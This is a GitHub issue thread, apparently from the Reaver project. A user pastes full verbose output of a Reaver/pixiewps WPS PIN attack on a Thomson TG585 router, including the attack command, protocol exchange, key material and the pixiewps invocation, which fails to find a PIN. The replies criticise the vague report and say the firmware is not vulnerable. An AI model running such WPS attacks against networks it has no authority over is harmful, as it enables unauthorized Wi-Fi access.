WPS pin not found!

Question

WPS pin not found!

firefox07 opened this issue 7 years ago · 2 comments

reaver -i mon0 -b 08:76:FF:65:B9:FC -c 6 -vvv -K 1

Reaver v1.6.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner cheffner@tacnetsol.com

[+] Switching mon0 to channel 6
[+] Waiting for beacon from 08:76:FF:65:B9:FC
[+] Received beacon from 08:76:FF:65:B9:FC
[+] Vendor: RalinkTe
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
31 32 33 34 35 36 37 30 12345670
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:326
send_packet called from authenticate() 80211.c:357
[+] Sending authentication request
send_packet called from associate() 80211.c:410
[+] Sending association request
[+] Associated with 08:76:FF:65:B9:FC (ESSID: Thomson65B9FC)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=395 op_code=4)
WPS: Received WSC_MSG
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): d5 7c c9 6a 47 2a 5b ee 88 86 ee 07 ca 14 c0 87
WPS: Enrollee MAC Address 08:76:ff:65:b9:fc
WPS: Enrollee Nonce - hexdump(len=16): 35 3b 87 a7 93 e5 06 68 f8 83 bd 94 37 93 98 3f
WPS: Enrollee Authentication Type flags 0x20
WPS: No match in supported authentication types (own 0x0 Enrollee 0x20)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x8
WPS: No match in supported encryption types (own 0x0 Enrollee 0x8)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x84 [Label] [PBC]
WPS: Prefer PSK format key due to Enrollee not supporting display
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=7):
54 48 4f 4d 53 4f 4e THOMSON
WPS: Model Name - hexdump_ascii(len=10):
54 68 6f 6d 73 6f 6e 20 54 47 Thomson TG
WPS: Model Number - hexdump_ascii(len=6):
35 38 35 20 76 38 585 v8
WPS: Serial Number - hexdump_ascii(len=9):
31 31 30 37 53 46 36 43 46 1107SF6CF
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=16):
54 68 6f 6d 73 6f 6e 20 54 47 35 38 35 20 76 38 Thomson TG585 v8
WPS: Enrollee RF Bands 0x3
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 00000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 0d 19 b2 ba f8 35 66 df 31 8e db 3b dd 8f d6 b5
WPS: UUID-R - hexdump(len=16): 48 de 90 52 91 78 bf 42 5d aa 08 ec 44 10 0d 36
WPS: Building Message M2
WPS: * Version
WPS: * Message Type (5)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * UUID-R
WPS: * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): 4c f1 9f 9f dc a3 6b c7 2e 06 04 8b 04 52 8b 13 b8 31 b6 da 87 37 ae e3 c4 c4 f3 6e 4c 22 b2 a1 b6 e6 9f 42 52 80 1a 4d d7 a3 83 05 32 1b 4c 3d c6 8d af 53 51 c1 89 70 8e c4 61 6c 71 1b b8 80 97 be 85 97 d0 6e 8b 42 c3 fa 3f d9 23 4b 60 32 dc 06 b0 4e 2a eb e6 28 4e 31 59 c7 6e 1b 67 31 d7 86 a7 5e 34 30 41 e3 72 3e 72 49 0c 9b 38 33 30 f5 20 15 9c ce f9 37 4b dd b6 bb 65 21 1d f7 df e5 94 fb e8 f8 8d 80 d4 93 b4 71 4e db b3 be 94 4b f8 88 8c d1 81 e7 9d 4c 51 3e 1d 0d 7f 30 43 93 e6 47 78 f1 44 13 14 f1 ed 4c 45 27 1d 14 1e 42 48 dd a7 99 74 96 a3 f4 d0 8a 14 bf dc a5
DH: public value - hexdump(len=192): 47 3d a1 d3 7d e9 5e 96 e8 83 09 a5 66 7b fc 64 22 ee 48 ef e2 e6 e9 a0 ae 75 92 0e 1a fc 30 c1 75 11 54 80 8a 8d 16 f0 5d 47 1d e6 7c f1 cc 12 ac 13 d5 58 73 ea ac e5 65 78 f2 3f 4b 13 0c 96 92 15 86 b6 18 5c 56 7a e3 07 48 b9 4a 5a d8 0c e8 51 d4 1e 60 a6 35 db 20 5f 19 f4 e0 f9 de a6 8b 9e 1b f3 c2 8c 15 23 e0 e0 6f b5 08 92 14 de ed 4a ce 8e c0 1c 00 5f f3 f1 94 ee 6e 21 ba be 69 e9 84 da e2 34 95 bd c8 49 1e c5 a1 50 1b 83 e0 29 ef 19 f6 c6 8b 7b da 04 ab ca 41 d0 6b e4 77 d4 55 16 d1 9f 42 ca 87 6a 63 1d 2d 60 b0 e2 8c 21 a9 a7 5e 46 c3 3e bf eb 5c ed 6f 13 79 e7
WPS: DH Private Key - hexdump(len=192): 4c f1 9f 9f dc a3 6b c7 2e 06 04 8b 04 52 8b 13 b8 31 b6 da 87 37 ae e3 c4 c4 f3 6e 4c 22 b2 a1 b6 e6 9f 42 52 80 1a 4d d7 a3 83 05 32 1b 4c 3d c6 8d af 53 51 c1 89 70 8e c4 61 6c 71 1b b8 80 97 be 85 97 d0 6e 8b 42 c3 fa 3f d9 23 4b 60 32 dc 06 b0 4e 2a eb e6 28 4e 31 59 c7 6e 1b 67 31 d7 86 a7 5e 34 30 41 e3 72 3e 72 49 0c 9b 38 33 30 f5 20 15 9c ce f9 37 4b dd b6 bb 65 21 1d f7 df e5 94 fb e8 f8 8d 80 d4 93 b4 71 4e db b3 be 94 4b f8 88 8c d1 81 e7 9d 4c 51 3e 1d 0d 7f 30 43 93 e6 47 78 f1 44 13 14 f1 ed 4c 45 27 1d 14 1e 42 48 dd a7 99 74 96 a3 f4 d0 8a 14 bf dc a5
WPS: DH own Public Key - hexdump(len=192): 47 3d a1 d3 7d e9 5e 96 e8 83 09 a5 66 7b fc 64 22 ee 48 ef e2 e6 e9 a0 ae 75 92 0e 1a fc 30 c1 75 11 54 80 8a 8d 16 f0 5d 47 1d e6 7c f1 cc 12 ac 13 d5 58 73 ea ac e5 65 78 f2 3f 4b 13 0c 96 92 15 86 b6 18 5c 56 7a e3 07 48 b9 4a 5a d8 0c e8 51 d4 1e 60 a6 35 db 20 5f 19 f4 e0 f9 de a6 8b 9e 1b f3 c2 8c 15 23 e0 e0 6f b5 08 92 14 de ed 4a ce 8e c0 1c 00 5f f3 f1 94 ee 6e 21 ba be 69 e9 84 da e2 34 95 bd c8 49 1e c5 a1 50 1b 83 e0 29 ef 19 f6 c6 8b 7b da 04 ab ca 41 d0 6b e4 77 d4 55 16 d1 9f 42 ca 87 6a 63 1d 2d 60 b0 e2 8c 21 a9 a7 5e 46 c3 3e bf eb 5c ed 6f 13 79 e7
WPS: DH Private Key - hexdump(len=192): 4c f1 9f 9f dc a3 6b c7 2e 06 04 8b 04 52 8b 13 b8 31 b6 da 87 37 ae e3 c4 c4 f3 6e 4c 22 b2 a1 b6 e6 9f 42 52 80 1a 4d d7 a3 83 05 32 1b 4c 3d c6 8d af 53 51 c1 89 70 8e c4 61 6c 71 1b b8 80 97 be 85 97 d0 6e 8b 42 c3 fa 3f d9 23 4b 60 32 dc 06 b0 4e 2a eb e6 28 4e 31 59 c7 6e 1b 67 31 d7 86 a7 5e 34 30 41 e3 72 3e 72 49 0c 9b 38 33 30 f5 20 15 9c ce f9 37 4b dd b6 bb 65 21 1d f7 df e5 94 fb e8 f8 8d 80 d4 93 b4 71 4e db b3 be 94 4b f8 88 8c d1 81 e7 9d 4c 51 3e 1d 0d 7f 30 43 93 e6 47 78 f1 44 13 14 f1 ed 4c 45 27 1d 14 1e 42 48 dd a7 99 74 96 a3 f4 d0 8a 14 bf dc a5
WPS: DH peer Public Key - hexdump(len=192): 24 ad 87 41 fd 59 0f 7f 2f 94 0e 48 70 d1 5c 97 8a 4d 9c 87 c0 46 0f 1a 0c 16 1c 4c bf 0f 74 7b 58 a6 5e 63 f8 ad f7 71 ea 29 44 19 21 f3 76 31 86 63 17 fa 41 8b b2 b4 0a 12 57 8c 8d c1 68 8a 1a 8b c9 59 74 c5 3e 0d 19 78 32 67 c4 f4 86 8d 76 f9 4c 2a 16 42 00 0e 7e 35 55 8c 81 9d 48 19 a3 7b b5 3f 93 53 c2 66 8d 88 7e 1b e4 e6 4b 77 99 ab 5e 0e e1 bd 4b 48 3e 84 f4 53 66 49 67 5f b1 46 f0 a8 a9 6a 17 e9 27 a4 c8 f5 a8 48 89 a9 2e ac 82 46 9b cd 3a 03 9f 83 ca 44 51 89 a4 14 db 15 75 06 fa 21 a1 02 b3 21 6f 27 9d 46 13 d9 a1 b8 96 d2 7a fb ea 28 de bc 2c a6 7b 3b 78 fc
DH: shared key - hexdump(len=192): 55 5b 27 d9 c9 bf 06 0e 0a 5c bf de c6 35 9e 43 7e 02 50 78 3b 25 a3 2b 5a 8b 23 37 bc 91 67 35 97 f4 49 1d af dd c3 73 96 30 76 4c 03 ee 37 ed f1 44 a0 3c 3c c2 c2 12 42 cc ee 87 76 32 dd 69 fd 60 d7 25 58 b2 98 8f 64 ea 05 ab 35 0d d9 41 ae 3c 83 2b 33 f4 b7 23 ad 4d 82 0b 23 d9 d0 24 32 39 b4 65 6a c5 93 9c c8 00 6c 6c 1b 84 17 e4 05 cd bf 68 3d 6d d3 d6 33 7d 66 85 83 b4 c6 ce 41 10 72 a8 58 41 97 c5 fb 81 2c 58 ba 5f fa 88 64 51 99 16 28 3f 99 6a ac f0 fb 6e 1c 38 69 28 e7 d6 13 5b 69 63 6f ff 00 a4 57 18 51 e5 2f ae 6e 7b 20 a4 0f 05 30 15 dd 64 e9 d4 b5 ad 67 ce
WPS: DH shared key - hexdump(len=192): 55 5b 27 d9 c9 bf 06 0e 0a 5c bf de c6 35 9e 43 7e 02 50 78 3b 25 a3 2b 5a 8b 23 37 bc 91 67 35 97 f4 49 1d af dd c3 73 96 30 76 4c 03 ee 37 ed f1 44 a0 3c 3c c2 c2 12 42 cc ee 87 76 32 dd 69 fd 60 d7 25 58 b2 98 8f 64 ea 05 ab 35 0d d9 41 ae 3c 83 2b 33 f4 b7 23 ad 4d 82 0b 23 d9 d0 24 32 39 b4 65 6a c5 93 9c c8 00 6c 6c 1b 84 17 e4 05 cd bf 68 3d 6d d3 d6 33 7d 66 85 83 b4 c6 ce 41 10 72 a8 58 41 97 c5 fb 81 2c 58 ba 5f fa 88 64 51 99 16 28 3f 99 6a ac f0 fb 6e 1c 38 69 28 e7 d6 13 5b 69 63 6f ff 00 a4 57 18 51 e5 2f ae 6e 7b 20 a4 0f 05 30 15 dd 64 e9 d4 b5 ad 67 ce
WPS: DHKey - hexdump(len=32): bb 0d 2e ab 38 e8 3d 59 67 90 93 33 b8 30 66 4b 3e 9a 3b b8 c3 65 7a a2 38 d7 17 92 d7 48 ec 86
WPS: KDK - hexdump(len=32): e9 57 53 a4 4b 8d 10 49 c6 ee 5d fc 16 e2 67 73 a1 44 1f 65 0c 6b 95 5d 23 7f 70 9b 38 24 c5 6e
WPS: AuthKey - hexdump(len=32): b0 06 46 6d 45 d7 55 7b ff 33 6a 3f 12 32 39 1d 32 8e 54 a7 17 56 54 c3 5d af 38 6c cc e3 15 11
WPS: KeyWrapKey - hexdump(len=16): f7 de 4a 1e 6c eb c4 3b b6 dd 30 e8 7d 1f a5 31
WPS: EMSK - hexdump(len=32): 1e de f8 86 4a ad 8d bd 3f b6 28 46 ce 72 ec c5 23 70 d1 65 0f ae 92 f9 1e 46 94 a3 e8 94 87 14
WPS: * Authentication Type Flags
WPS: * Encryption Type Flags
WPS: * Connection Type Flags
WPS: * Config Methods (8c)
WPS: * Manufacturer
WPS: * Model Name
WPS: * Model Number
WPS: * Serial Number
WPS: * Primary Device Type
WPS: * Device Name
WPS: * RF Bands (0)
WPS: * Association State
WPS: * Configuration Error (0)
WPS: * Device Password ID (0)
WPS: * OS Version
WPS: * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=114 op_code=4)
WPS: Received WSC_MSG
WPS: Parsed WSC_MSG
WPS: Received M3
WPS: E-Hash1 - hexdump(len=32): ed 1b 0d 05 eb 28 c2 4e d2 18 d3 cf 58 46 f4 3d 26 ba 26 99 59 6b bb 3c 5b bc 79 a7 8e 0a 35 0f
WPS: E-Hash2 - hexdump(len=32): cf 58 c9 56 7a 51 17 ac 78 bf 43 13 23 78 02 37 56 0c d3 0b 59 a9 17 a4 5b ea 63 55 df 0d 98 39
executing pixiewps -e 24ad8741fd590f7f2f940e4870d15c978a4d9c87c0460f1a0c161c4cbf0f747b58a65e63f8adf771ea29441921f37631866317fa418bb2b40a12578c8dc1688a1a8bc95974c53e0d19783267c4f4868d76f94c2a1642000e7e35558c819d4819a37bb53f9353c2668d887e1be4e64b7799ab5e0ee1bd4b483e84f4536649675fb146f0a8a96a17e927a4c8f5a84889a92eac82469bcd3a039f83ca445189a414db157506fa21a102b3216f279d4613d9a1b896d27afbea28debc2ca67b3b78fc -s ed1b0d05eb28c24ed218d3cf5846f43d26ba2699596bbb3c5bbc79a78e0a350f -z cf58c9567a5117ac78bf431323780237560cd30b59a917a45bea6355df0d9839 -a b006466d45d7557bff336a3f1232391d328e54a7175654c35daf386ccce31511 -n 353b87a793e50668f883bd943793983f -r 473da1d37de95e96e88309a5667bfc6422ee48efe2e6e9a0ae75920e1afc30c1751154808a8d16f05d471de67cf1cc12ac13d55873eaace56578f23f4b130c96921586b6185c567ae30748b94a5ad80ce851d41e60a635db205f19f4e0f9dea68b9e1bf3c28c1523e0e06fb5089214deed4ace8ec01c005ff3f194ee6e21babe69e984dae23495bdc8491ec5a1501b83e029ef19f6c68b7bda04abca41d06be477d45516d19f42ca876a631d2d60b0e28c21a9a75e46c33ebfeb5ced6f1379e7

Pixiewps 1.4

[-] WPS pin not found!

[*] Time taken: 0 s 203 ms

Answer 1 · 2018-01-04T15:10:31.000Z

It really helps when users use a title that is not “plz help pin not fond”. This really makes the developers not want to help considering you put no effort into describing your issue, besides an unformatted paste of Reaver’s output. Give us more information please.

Answer 2 · 2018-01-04T17:08:59.000Z

It's not supported/vulnerable. It runs a customized firmware.